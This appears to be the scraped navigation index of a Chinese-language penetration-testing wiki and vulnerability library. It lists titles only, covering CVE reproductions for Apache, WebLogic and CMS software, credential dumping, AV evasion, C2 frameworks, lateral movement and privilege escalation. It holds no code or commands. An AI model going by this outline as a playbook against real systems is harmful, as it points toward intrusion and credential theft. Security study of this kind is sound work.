    
    Apache Kylin CubeService.java 命令注入漏洞 CVE-2020-1956
    
    Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925
    
    Apache Kylin config 未授权配置泄露 CVE-2020-13937
    
    Apache Log4j2 JNDI 远程命令执行漏洞 CVE-2021-44228
    
    Apache Mod_jk 访问控制权限绕过 CVE-2018-11759
    
    Apache OFBiz RMI反序列化漏洞 CVE-2021-26295
    
    Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580
    
    Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483
    
    Apache Solr Debug-Mode 远程执行漏洞 CVE-2019-0193
    
    Apache Solr JMX服务 RCE CVE-2019-12409
    
    Apache Solr Log4j组件远程命令执行漏洞
    
    Apache Solr RCE 未授权上传漏洞 CVE-2020-13957
    
    Apache Solr RCE 远程命令执行漏洞 CVE-2017-12629
    
    Apache Solr Velocity模板远程执行 CVE-2019-17558
    
    Apache Solr XXE 漏洞 CVE-2017-12629
    
    Apache Solr config 任意文件读取漏洞
    
    Apache Spark create 未授权访问漏洞
    
    Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891
    
    Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631
    
    Apache Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805
    
    Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524
    
    Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938
    
    Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935
    
    Apache Tomcat 远程代码执行漏洞 CVE-2017-12615
    
    Apache Zeppelin 未授权任意命令执行漏洞
    
    Apache ZooKeeper 未授权访问漏洞 CVE-2014-085
    
    GoCD
    GoCD
    
    GoCD plugin 任意文件读取漏洞 CVE-2021-43287
    
    Goahead
    Goahead
    
    Goahead LD_PRELOAD 远程命令执行漏洞 CVE-2017-17562
    
    Goahead LD_PRELOAD 远程命令执行漏洞 CVE-2021-42342
    
    JBoss
    JBoss
    
    JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
    
    Jenkins
    Jenkins
    
    Jenkins CI 远程代码执行漏洞 CVE-2017-1000353
    
    Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861
    
    Jenkins script 远程命令执行漏洞
    
    Minihttpd
    Minihttpd
    
    ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778
    
    Nginx
    Nginx
    
    Nginx越界读取缓存漏洞 CVE-2017-7529
    
    PayaraMicro
    PayaraMicro
    
    PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
    
    Weblogic
    Weblogic
    
    WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371
    
    Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
    
    Weblogic SSRF漏洞 CVE-2014-4210
    
    Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
    
    Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725
    
    Zabbix
    Zabbix
    
    Zabbix SAML身份绕过漏洞 CVE-2022-23131
    
    Muhttpd
    Muhttpd
    
    muhttpd 任意文件读取漏洞 CVE-2022-31793
Pentest Note
Pentest Note
- 个人卫生
- HASH操作
  HASH操作
  - Empire
  - Getpass
  - GoogleColab破解HASH
  - Invoke Dcsync
  - MSF
  - QuarksPwDump
  - laZagne
  - 密码破解网站
  - 密码策略
  - 开启Wdigest
  - Mimikatz
    Mimikatz
    
    Cisco Jabber转储lsass
    
    Dumpert
    
    JScript
    
    Powershell Bypass
    
    Procdump64+mimikatz
    
    SqlDumper+mimikatz
    
    Dotnet2.0
    
    dotnet4.0Msbuild
    
    Mimikatz
    
    Mimipenguin
    
    横向批量抓HASH
    
    绕过卡巴斯基
    
    调用mimikatz远程抓取
    
    远程LSASS进程转储 Physmem2profit
  - 域HASH提取
    域HASH提取
    
    MSF
    
    NTDSDumpex
    
    Nishang脚本
    
    Ntdsutil
    
    Powersploit
    
    Vssadmin
    
    Wmivssadmin
    
    Esentutl
    
    Impacket工具包
    
    Mimikatz
  - 破解工具
    破解工具
    
    Hydra
    
    Medusa
  - 缓存HASH获取
    缓存HASH获取
    
    Ninjacopy
    
    Quarks pwdump
    
    注册表
  - 获取其他密码
    获取其他密码
    
    Chrome
    
    Firefox
    
    Foxmail
    
    Navicat
    
    Seatbelt
    
    Securecrt
    
    Vncpass
- 云安全
  云安全
  - 云安全培训
  - 工具
  - AWS
    AWS
    
    AWS的服务
    
    Golden SAML Attack
    
    InstanceConnect 将SSH密钥推送到EC2实例
    
    Lambda 提取函数的代码
    
    SSM 命令执行
    
    Shadow Copy attack
    
    使用AMI映像复制EC2
    
    初始访问
    
    动态数据库
    
    将EBS卷挂载到EC2Linux
    
    工具
    
    权限提升
    
    权限维持
    
    枚举
    
    禁用CloudTrail
    
    通过API密钥获得AWS控制台访问权限
    
    通过混淆Cloudtrail日志和GuardDuty来掩盖踪迹
  - Aliyun
    Aliyun
    
    Osskey
  - Azure
    Azure
    
    Administrative Unit
    
    AzureAD
    
    AzureAD连接
    
    Azure存储Blob
    
    Intunes管理
    
    KeyVault
    
    Pass The Certificate
    
    Pass The PRT
    
    为AzureWeb应用程序生成SSH
    
    令牌
    
    侦察工具
    
    动态组成员资格
    
    向所有EnterpriseApplications添加凭据
    
    应用程序代理
    
    条件访问
    
    枚举
    
    自动化runbook
    
    虚拟机runCommand
    
    部署模板
    
    钓鱼
    
    非法同意
  - Docker
    Docker
    
    未授权API
    
    权限维持
    
    逃逸
  - GCP
    GCP
    
    初始访问
    
    权限维持
    
    枚举
    
    特权升级和横向移动
  - Kubernetes
    Kubernetes
    
    未授权API
    
    权限提升
    
    权限维持
    
    枚举
- 内网和域
  内网和域
  - 信息搜集
    信息搜集
    
    ADDomain
    
    BloodHoundAD
    
    Cmd
    
    Linux
    
    Powershell基础操作
    
    Powerview
    
    Windows安全标识符SID
    
    Wmi
    
    临时HTTP服务架设
  - 命令与控制
    命令与控制
    
    DNS TXT Command
    
    Dropbox
    
    Gmail
    
    Jsrat
    
    Openssl
    
    Powershell
    
    SILENTTRINITY
    
    Browser
    
    Crackmap
    
    Dnscat
    
    Koadic
    
    Telegram
    
    下载并执行
    
    交互式shell
    
    反弹shell
    
    工具
    
    CobaltStrike
    CobaltStrike
    
    Beacon
    
    Malleable C2
    
    Office宏
    
    上线提醒
    
    与msf和empire交互
    
    交互
    
    代理
    
    克隆
    
    加载脚本
    
    安装
    
    攻击模块
    
    权限维持
    
    模块
    
    横向移动
    
    浏览器劫持
    
    监听
    
    视图模块
    
    连接
    
    部署
    
    部署VPN
    
    钓鱼邮件
    
    隔离网络
    
    Empire
    Empire
    
    Empire Word
    
    与cs和msf交互
    
    后门
    
    安装
    
    权限提升
    
    模块
    
    横向移动
    
    生成
    
    监听
    
    连接靶机及其他操作
    
    Metasploit
    Metasploit
    
    Meterpreter
    
    与cs和empire交互
    
    常规使用
    
    模块
    
    细节使用
  - 端口映射和转发
    端口映射和转发
    
    Ligolo
    
    SharpChisel
    
    Chisel
    
    Iptables
    
    Lcx
    
    Msf
    
    Netsh
    
    Ssf
    
    Ssh
- 初始访问
  初始访问
  - MSSQL&Agent之Job上线
  - MySQL不登陆执行命令
  - MySQL开启外联
  - MySQL连接读取文件
  - TomcatAjp之LFI&RCE
  - Web服务突破
    Web服务突破
    
    CSRF
    
    CmdHijack
    
    DNSLOG
    
    Fuzz目录
    
    IIS写权限
    
    PHP FPM之RCE
    
    PHPMyAdmin利用
    
    PHPstudy后门
    
    PHP包含下载读取
    
    SSRF
    
    SSTI
    
    Web server日志分析命令
    
    XML
    
    XSS
    
    Xpath注入
    
    Web程序漏洞
    
    Wso2
    
    从LFI到RCE
    
    前端
    
    命令执行
    
    命令注入
    
    天r信
    
    数据库
    
    深x服
    
    绕过WAF
    
    编辑器漏洞
    
    邮件地址payload
    
    默认密码
    
    SQL注入
    SQL注入
    
    DB2
    
    MSSQL
    
    MYSQL
    
    Oracle
    
    PostgreSQL
    
    SQLMAP
    
    SQLite
    
    判断注入
    
    数据库类型识别
  - 一些Bypass
    一些Bypass
    
    Bypass mod security
    
    ImageMagick组件绕过
    
    Linux绕过disable function
    
    Open basedir绕过
    
    Windows系统组件com绕过
    
    Cgi启动方式
    
    常规函数绕过
    
    绕过lsa protection
    
    蚁剑绕过
  - 未授权访问
    未授权访问
    
    CouchDB
    
    Jenkins
    
    Redis
    
    Solr
    
    VNC
    
    Weblogic
    
    Zabbix
    
    Activemq
    
    Docker
    
    Elastic
    
    Hadoop
    
    Jboss
    
    Memcache
    
    Mongo
    
    Zookeeper
  - 近源攻击
    近源攻击
    
    BadUSB
    
    WI FI破解
    
    克隆卡
    
    无线干扰
    
    蓝牙
    
    钓鱼网络
  - 鱼叉式攻击
    鱼叉式攻击
    
    第三方鱼叉
    
    钓鱼连接
    
    钓鱼邮件
- 收集信息
  收集信息
  - 人员信息
  - 其他信息
  - 子域名检查
  - 网站架构和指纹识别
  - IP和端口信息
    IP和端口信息
    
    ASN
    
    NMAP使用
    
    历史IP
    
    工具
  - 域名信息
    域名信息
    
    CDN是否存在
    
    DNS历史记录
    
    SSL证书信息
    
    Whois信息
    
    绕过CDN
- 文件操作
  文件操作
  - Linux查找文件
  - Windows查找文件
  - 创建
  - 压缩
  - 查找可写目录
  - 解压
  - 远程解压文件
  - 传输
    传输
    
    WindowsDefender
    
    Bitsadmin
    
    Certutil
    
    Curl
    
    Ftp
    
    Js
    
    Nc
    
    Perl
    
    Php
    
    Powershell
    
    Py
    
    Scp
    
    Vbs
    
    Wget
- 权限提升
  权限提升
  - Linux提权
    Linux提权
    
    LD Preload提权
    
    Linux Exploit Suggester
    
    LinuxSUID提权
    
    Linux计划任务
    
    Lxd提权
    
    MYSQL Linux Root
    
    MYSQL漏洞
    
    Sudo提权
    
    一些检测工具
    
    可写文件提权
    
    查找可能泄露的密码
    
    查找辅助信息
    
    漏洞提权
    
    环境变量提权
    
    通配符提权
  - Windows提权
    Windows提权
    
    AlwaysInstallElevated提权
    
    AppLocker
    
    BypassUAC
    
    CVE 2020 1472
    
    DLL劫持
    
    DNS组到DomainAdmin
    
    EFSPotato
    
    HiveNightmare
    
    JuicyPotato
    
    MSF
    
    MSSQL
    
    MYSQLudf
    
    PowerUp
    
    Powerup AlwaysInstallElevated
    
    PrintNightmare
    
    RoguePotato
    
    RottenPotato
    
    Runas
    
    SamAccountSpoofing
    
    SeBackupPrivilege
    
    SeImpersonatePrivilege
    
    Searchsploit
    
    SpoolFool
    
    Vulnerable Services
    
    WSL子系统
    
    Wesng
    
    Whitelist白名单
    
    Windows exploit suggester
    
    Impactet工具包
    
    Watson
    
    不安全的GUI应用程序
    
    从administrator到system
    
    令牌窃取
    
    密码窃取
    
    弱权限的PATH目录
    
    弱注册表权限
    
    恢复服务帐户的权限
    
    打印机漏洞
    
    服务中的不正确权限
    
    未引用的服务路径
    
    本机文件和脚本
    
    激活guest
    
    特权文件写入
    
    环境变量优先
    
    RDP&Firewall
    RDP&Firewall
    
    MSF开启
    
    RDP连接记录
    
    Wmic开启
    
    删除痕迹
    
    多用户登陆
    
    注入点开启
    
    注册表开启
    
    爆破RDP
    
    防火墙
- 权限维持
  权限维持
- 横向移动
  横向移动
  - ASEPRoasting
  - CVE 2019 0708
  - GPP Password
  - MS08 067
  - MS17 010
  - MSF添加路由
  - MSF管道监听
  - Ngrok内网穿透
  - PASS THE HASH
  - PASS THE KEY
  - PASS THE TICKET
  - PXE启动映像攻击
  - PrivExchange攻击
  - RODC 只读域控制器入侵
  - SCCM部署
  - WSUS部署
  - WinRM无文件执行
  - Kerberos无约束委派
  - Kerberos约束委派
  - kerberos青铜比特攻击CVE 2020 17049
  - 共享
  - 危险的内置组使用
  - 域与域
  - 域内爆破
  - 基于kerberos资源的约束委派
  - 快速定位域管理登过的机器
  - 攻击MSSQL数据库
  - 攻击MySQL数据库
  - 方程式内网不产生session
  - 添加域管命令
  - 组策略对象GPO
  - 获取保存的RDP密码
  - 账户委派
  - 资源受限委派
  - 隔离主机payload
  - ActiveDirectory的ACL和ACE
    ActiveDirectory的ACL和ACE
    
    GenericAll
    
    GenericWrite
    
    WriteDACL
    
    WriteOwner
    
    强制更改密码
    
    读取GMSA密码
    
    读取LAPS密码
  - ActiveDirectory证书服务
    ActiveDirectory证书服务
    
    ESC1 配置错误的证书模板
    
    ESC2 配置错误的证书模板
    
    ESC3 配置错误的注册代理模板
    
    ESC4 访问控制漏洞
    
    ESC6 EDITF ATTRIBUTESUBJECTALTNAME2
    
    ESC7 易受攻击的证书颁发机构访问控制
    
    ESC8 ADCS中继攻击
    
    Pass The Certificate
    
    查找证书服务器
    
    经过认证的CVE 2022 26923
  - DCOM Exploitation
    DCOM Exploitation
    
    DCOM
    
    通过MMC应用程序类进行DCOM
    
    通过Office进行DCOM
    
    通过ShellBrowserWindow进行DCOM
    
    通过ShellExecute进行DCOM
  - Kerberoasting
    Kerberoasting
    
    GetUserSPNs
    
    SPN发现
    
    导出票据
    
    申请票据
    
    破解密码
    
    重写票据
  - NTLM中继和中间人攻击
    NTLM中继和中间人攻击
    
    CVE 2019 1040
    
    CVE 2019 1384
    
    DNS Poisonning
    
    MS08 068 NTLM反射
    
    Ntlmrelayx+资源受限委派
    
    RemotePotato0
    
    Responder+LLMNR毒害
    
    SMB签名禁用和IPv4
    
    SMB签名禁用和IPv6
    
    WebDav中继
    
    捕获和破解Net NTLMv1和NTLMv1哈希
  - 代理
    代理
    
    GoToHTTP
    
    Gost
    
    RustDesk
    
    Chisel
    
    Earthworm
    
    Frp
    
    Goproxy
    
    Revsocks
    
    Shadowsocks
    
    Sock4a
    
    Socks5
    
    Socks5web
    
    Ssf
    
    Ssh
    
    代理软件
  - 执行命令&IPC&计划任务
    执行命令&IPC&计划任务
    
    AT
    
    IPC
    
    Schtasks
    
    Wmic
  - 探测存活主机
    探测存活主机
    
    For+Ping命令查询存活主机
    
    MSF
    
    NMAP
    
    NbtScan
    
    NetDiscover
    
    Rp scan
    
    代理nmap扫描
    
    内外网资产对应
  - 探测服务&端口
    探测服务&端口
    
    CobaltStrike+K8Aggressor
    
    Linux Samba服务
    
    MSF
    
    Masscan
    
    Nc
    
    PTScan
    
    Powershell
    
    SMB
    
    常见端口
- 赏金技巧
  赏金技巧
  - 2FA双因子认证绕过
  - 403 bypass
  - CMS
  - Github
  - Favico信息
  - Git和svn
  - Sql注入检测
  - 参数污染
  - 命令注入Bypass
  - 子域名接管
  - 未认证的ElasticsearchDB
  - 测试是否存在heartbleed漏洞
  - 绕过登录限制
  - 通过.json的信息泄露
  - 配置错误的云存储桶
  - TOP系列
    TOP系列
    
    Top25LFI参数
    
    Top25RCE参数
    
    Top25ssrf
    
    Top25重定向dorks
  - 一行命令
    一行命令
    
    使用grep快速去除垃圾数据
    
    查找漏洞
  - 字典
    字典
    
    loT高频率账户密码
    
    从站点生成字典
    
    已泄露的密码整理出的字典
    
    来自github的字典
    
    查找git和svn的字典
- 防御规避
  防御规避
  - 360白名单
  - Bypass AMSI
  - DLL劫持
  - Evasion模块
  - Golang
  - GreatSCT
  - InstallUtil
  - MSBuilt
  - MSF捆绑
  - Mshta
  - Pezor免杀
  - Phantom Evasion
  - RC4
  - Ruby
  - Shellter
  - Veil
  - Avet
  - Carboncopy
  - Cshot远程shellcode
  - C代码加载图片马
  - hanzoInjection
  - The backdoor factory
  - Zirikatu
  - 一些可尝试绕过白名单的执行
  - 内存中解码shellcode绕过av
  - 在Windows Server 2016和2019中绕过WindowsDefender
  - 捆绑器
  - 绕过安全狗脚本
  - C#源码免杀
    C#源码免杀
    
    CSC+InstallUtil
    
    XOR和AES编码
    
    加密处理
    
    直接编译
  - MSF+shellcode免杀
    MSF+shellcode免杀
    
    C和c++源码免杀
    
    Nps payload
    
    编码器
  - Powershell免杀
    Powershell免杀
    
    CobaltStrike+Powershell免杀
    
    Invoke Shellcode
    
    Out EncryptedScript
    
    PyFuscation
    
    Xencrypt
    
    Obfuscation
    
    分块免杀
    
    拆分+C编译
    
    直接生成
    
    行为检测
  - Python源码免杀
    Python源码免杀
    
    Base64编码+Pyinstaller打包
    
    pyinstaller加载C代码编译
    
    Pyinstaller加载py代码编译
    
    加载器分离
  - 加载器免杀
    加载器免杀
    
    SSI加载
    
    Shellcode launcher
Qingy Wiki
Qingy Wiki
- IOT安全
  IOT安全
  - Amazon Kindle Fire HD (3rd)
    Amazon Kindle Fire HD (3rd)
    
    （CVE 2018 11019）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    （CVE 2018 11019）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    CVE-2018-11019）Amazon Kindle Fire HD (3^rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    （CVE 2018 11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    （CVE-2018-11020）Amazon Kindle Fire HD (3^rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11021）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    （CVE 2018 11021）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    （CVE-2018-11021）Amazon Kindle Fire HD (3^rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11022）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    （CVE 2018 11022）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    （CVE-2018-11022）Amazon Kindle Fire HD (3^rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11023）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    （CVE 2018 11023）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11023）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    （CVE 2018 11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11025）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    （CVE 2018 11025）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
    
    （CVE 2018 11025）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
  - Windows Spooler Service
    Windows Spooler Service
    
    Windows Spooler Service RCE(CVE 2021 1675 )
    Windows Spooler Service RCE(CVE 2021 1675 )
    
    Windows Spooler Service RCE(CVE 2021 1675 )
  - 小米
    小米
    
    (CVE 2019 18370)Xiaomi Mi WiFi R3G 远程命令执行漏洞
    (CVE 2019 18370)Xiaomi Mi WiFi R3G 远程命令执行漏洞
    
    (CVE-2019-18370)Xiaomi Mi WiFi R3G 远程命令执行漏洞
- Web安全
  Web安全
  - 74cms
    74cms
    
    （CVE 2019 11374）74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞
    （CVE 2019 11374）74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞
    
    （CVE-2019-11374）74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞
  - Apache DolphinScheduler
    Apache DolphinScheduler
    
    (CVE 2020 13922)Apache DolphinScheduler 权限覆盖漏洞
    (CVE 2020 13922)Apache DolphinScheduler 权限覆盖漏洞
    
    (CVE-2020-13922)Apache DolphinScheduler 权限覆盖漏洞
  - Apache Druid
    Apache Druid
    
    apache druid远程代码执行漏洞(CVE 2021 25646)
    apache druid远程代码执行漏洞(CVE 2021 25646)
    
    Apache Druid 远程代码执行漏洞（CVE-2021-25646）
  - Apache Ofbiz
    Apache Ofbiz
    
    (CVE 2021 26295)Apache OFBiz RMI反序列化漏洞
    (CVE 2021 26295)Apache OFBiz RMI反序列化漏洞
    
    Apache OFBiz RMI反序列化漏洞 CVE-2021-26295
  - Docker
    Docker
    
    Docker 容器逃逸漏洞 (CVE 2020 15257)复现
    Docker 容器逃逸漏洞 (CVE 2020 15257)复现
    
    Docker 容器逃逸漏洞 (CVE-2020-15257)复现
  - F5 BIG IP
    F5 BIG IP
    
    (CVE 2021 22986) F5 BIG IP iControl RCE
    (CVE 2021 22986) F5 BIG IP iControl RCE
    
    (CVE-2021-22986) F5 BIG-IP iControl RCE
  - Jboss
    Jboss
    
    JexBoss JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
    JexBoss JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
    
    JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
  - Maccms
    Maccms
    
    Maccms 8.x(苹果cms)post注入
    Maccms 8.x(苹果cms)post注入
    
    Maccms 8.x post注入
    
    Maccms 8.x(苹果cms)命令执行漏洞
    Maccms 8.x(苹果cms)命令执行漏洞
    
    Maccms 8.x(苹果cms)命令执行漏洞
  - MyBB
    MyBB
    
    Mybb XSS SQL RCE POC(CVE 2021 27890 & CVE 2021 27889)
    Mybb XSS SQL RCE POC(CVE 2021 27890 & CVE 2021 27889)
    
    Mybb-XSS_SQL_RCE-POC(CVE-2021-27890 & CVE-2021-27889)
  - Nexus
    Nexus
    
    Nexus Repository Manager3 ProXXE分析(CVE 2020 29436)
    Nexus Repository Manager3 ProXXE分析(CVE 2020 29436)
    
    Nexus Repository Manager3 ProXXE分析(CVE-2020-29436)
  - OKLite
    OKLite
    
    OKLite v1.2.25 SQL注入导致getshell(前台)
    OKLite v1.2.25 SQL注入导致getshell(前台)
    
    OKLite v1.2.25 SQL注入导致getshell(前台)
  - Semcms
    Semcms
    
    Semcms PHP(多语)版 V3.9 sql注入漏洞
    Semcms PHP(多语)版 V3.9 sql注入漏洞
    
    Semcms PHP(多语)版 V3.9 sql注入漏洞
  - Thinkphp
    Thinkphp
    
    Thinkphp 6.x 漏洞
    Thinkphp 6.x 漏洞
    
    ThinkAdmin未授权列目录任意文件读取(CVE 2020 25540)漏洞
    ThinkAdmin未授权列目录任意文件读取(CVE 2020 25540)漏洞
    
    ThinkAdmin未授权列目录/任意文件读取(CVE-2020-25540)漏洞
  - Tomcat URL解析差异性导致的安全问题
    Tomcat URL解析差异性导致的安全问题
    
    调试分析
    调试分析
    
    Tomcat getContextPath()的处理
    Tomcat getContextPath()的处理
    
    Tomcat getContextPath()的处理
    
    Tomcat getPathInfo()的处理
    Tomcat getPathInfo()的处理
    
    Tomcat getPathInfo()的处理
    
    Tomcat getRequestURI()的处理
    Tomcat getRequestURI()的处理
    
    Tomcat getRequestURI()的处理
    
    Tomcat getRequestURL()的处理
    Tomcat getRequestURL()的处理
    
    Tomcat getRequestURL()的处理
    
    Tomcat getServletPath()的处理
    Tomcat getServletPath()的处理
    
    Tomcat getServletPath()的处理
  - Wordpress
    Wordpress
    
    Wordpress 插件漏洞
    Wordpress 插件漏洞
    
    （CVE 2019 16522）WordPress Plugin EU Cookie Law (GDPR) 储存型xss
    （CVE 2019 16522）WordPress Plugin EU Cookie Law (GDPR) 储存型xss
    
    （CVE-2019-16522）WordPress Plugin - EU Cookie Law (GDPR) 储存型xss
    
    Wordpress 系统漏洞
    Wordpress 系统漏洞
    
    （CVE 2019 8943）WordPress 5.0.3 Crop image Shell Upload (Metasploit)
    （CVE 2019 8943）WordPress 5.0.3 Crop image Shell Upload (Metasploit)
    
    （CVE-2019-8943）WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)
  - XStream
    XStream
    
    (CVE 2020 26217)XStream XML反序列化远程代码执行
    (CVE 2020 26217)XStream XML反序列化远程代码执行
    
    (CVE-2020-26217)XStream XML反序列化远程代码执行.md
  - 泛微oa
    泛微oa
    
    泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库)
    泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库)
    
    WorkflowCenterTreeData 接口注入漏洞(限oracle数据库)
Wgpsec
Wgpsec
- Knowledge
  Knowledge
Bylibrary
Bylibrary
- 漏洞库
  漏洞库
  - 01 CMS漏洞
    01 CMS漏洞
    
    ActiveMQ
    ActiveMQ
    
    ActiveMQ任意文件上传漏洞
    
    BSPHP
    BSPHP
    
    BSPHP存在未授权访问
    
    DedeCMS
    DedeCMS
    
    DedeCMS V5.7 SP2后台存在代码执行漏洞
    
    DedeCMS_v5.7_carbuyaction_存储型XSS
    
    DedeCMS_v5.7_shops_delivery_存储型XSS
    
    DedeCMS_v5.7_友情链接CSRF_GetShell
    
    DedeCms v5.6 嵌入恶意代码执行漏洞
    
    DedeCms后台地址泄露漏洞
    
    Dedecms V5.7后台任意代码执行CVE-2018-7700
    
    Dedecms swf文件反射型xss
    
    Dedecms 前台任意用户密码修改
    
    Dedecms任意用户登录SSV-97087
    
    Dedecms前台文件上传漏洞CVE-2018-20129
    
    Discuz
    Discuz
    
    Discuz! 1.5-2.5 命令执行漏洞
    
    Discuz3.4越权登录漏洞
    
    Discuz_＜3.4_birthprovince_前台任意文件删除
    
    dz-ml-rce.py ：discuz ml RCE 漏洞检测工具
    
    Discuz ml rce
    Discuz ml rce
    
    pocFiles
    
    DuomiCMS
    DuomiCMS
    
    DuomiCMS3.0SQL注入
    
    DuomiCMS3.0前台代码执行
    
    Ecshop
    Ecshop
    
    ECShop4.1.0前台免登录SQL注入
    
    ecshop2.x SQL注入
    
    Ecshop2.x 命令执行
    
    EmpireCMS
    EmpireCMS
    
    EmpireCMS V7.5后台getshell漏洞
    
    EmpireCMS V7.5后台xss漏洞
    
    EmpireCMS V7.5后台任意代码执行漏洞
    
    EmpireCMS 全版本XSS漏洞
    
    EmpireCMS
    
    EmpireCMS各版本漏洞环境搭建
    
    FineCMS
    FineCMS
    
    FineCMS v5.0.8两处getshell
    
    Finecms v5.4存在CSRF漏洞可修改管理员账户密码
    
    pocFiles
    
    FlameCMS
    FlameCMS
    
    CVE 2019 16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞
    
    GreenCMS
    GreenCMS
    
    GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户
    
    GreenCMS 跨站请求伪造漏洞
    
    HucartCMS
    HucartCMS
    
    Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号
    
    Joomla
    Joomla
    
    Joomla_3.4.4-3.6.3_未授权创建特权用户(CVE-2016-8869)
    
    Joomla 3.7.0 SQL注入漏洞CVE-2017-8917
    
    Joomla! 3.7.0 SQL注入(CVE-2017-8917)
    
    JoomlaRCE远程代码执行（CVE-2020-11890）
    
    Joomla 授权 RCE漏洞（CVE 2020 11890 CVE 2020 10238 CVE 2020 10239）
    
    Joomla! paGO Commerce 2.5.9.0 存在SQL 注⼊
    
    Joomla 3.4.6 远程命令执行
    
    Joomla 3.4.4 3.6.3 未授权创建特权用户(CVE 2016 8869)
    Joomla 3.4.4 3.6.3 未授权创建特权用户(CVE 2016 8869)
    
    pocFiles
    
    Joomla 3.7.0 SQL注入(CVE 2017 8917)
    Joomla 3.7.0 SQL注入(CVE 2017 8917)
    
    pocFiles
    
    KCMS
    KCMS
    
    KCMS5.0任意用户密码重置
    KCMS5.0任意用户密码重置
    
    KCMS5.0任意用户密码重置
    
    KCMS5.0前台SQL注入
    KCMS5.0前台SQL注入
    
    KCMS5.0前台SQL注入
    
    LFCMS
    LFCMS
    
    LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户
    
    LFCMS任意文件读取
    
    LFCMS前台sql注入（一）
    
    LFCMS前台sql注入（二）
    
    LFCMS后台getshell
    
    MetinfoCMS
    MetinfoCMS
    
    metinfo多个漏洞
    
    MetInfoCMS 5.X版本GETSHELL漏洞合集
    
    Metinfo 6.1.2版本存在XSS漏洞&SQL注入漏洞
    
    Methifo6.0.0任意文件删除&任意文件读取
    
    MiniCMS
    MiniCMS
    
    MiniCMS 1.10存在CSRF漏洞可增加管理员账户
    
    Nexus
    Nexus
    
    Cve 2019 7238 命令执行
    
    Cve 2020 10199
    
    OKLite
    OKLite
    
    CVE 2019 16131 OKLite v1.2.25 任意文件上传漏洞
    
    CVE 2019 16132 OKLite v1.2.25 存在任意文件删除漏洞
    
    PHPCMS
    PHPCMS
    
    PHPCMS_v9.6.0_SQL注入
    
    PHPCMS_v9.6.0_任意文件上传
    
    PHPCMS_v9.6.1_任意文件下载
    
    PHPCMS_v9.6.2_任意文件下载
    
    pocFiles
    
    SCMS
    SCMS
    
    S CMS PHP v3.0存在SQL注入漏洞
    
    S CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号
    
    ThinkCMS
    ThinkCMS
    
    CVE 2019 7580 thinkcmf 5.0.190111后台任意文件写入导致的代码执行
    
    ThinkCMF漏洞全集和
    
    ThinkCMF缓存Getshell漏洞
    
    ThinkSNS
    ThinkSNS
    
    ThinkSNS_V4 后台任意文件下载导致Getshell
    
    Thinkadmin
    Thinkadmin
    
    ThinkAdmin v6 列目录任意文件读取
    
    Thinkadmin v6任意文件读取漏洞（CVE-2020-25540）
    
    Thinkphp
    Thinkphp
    
    目录
    
    ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷
    
    Thinkphp 2.X RCE漏洞 Thinkphp 2.X RCE漏洞
    目录
    
    漏洞范围
    
    漏洞POC
    
    Thinkphp 2.X RCE漏洞环境搭建
    
    Thinkphp 3.2.3 缓存漏洞
    
    Thinkphp 5.0.(0-21)&5.1.(3-25)sql注入漏洞
    
    Thinkphp 5.0.(13-15)&5.1.(0-5) sql注入漏洞
    
    Thinkphp 5.0.(7-22)&5.1.(0-30)远程代码执行漏洞
    
    Thinkphp 5.0.10 sql注入漏洞
    
    Thinkphp 5.1.( 31)&5.0.( 23)远程代码执行
    
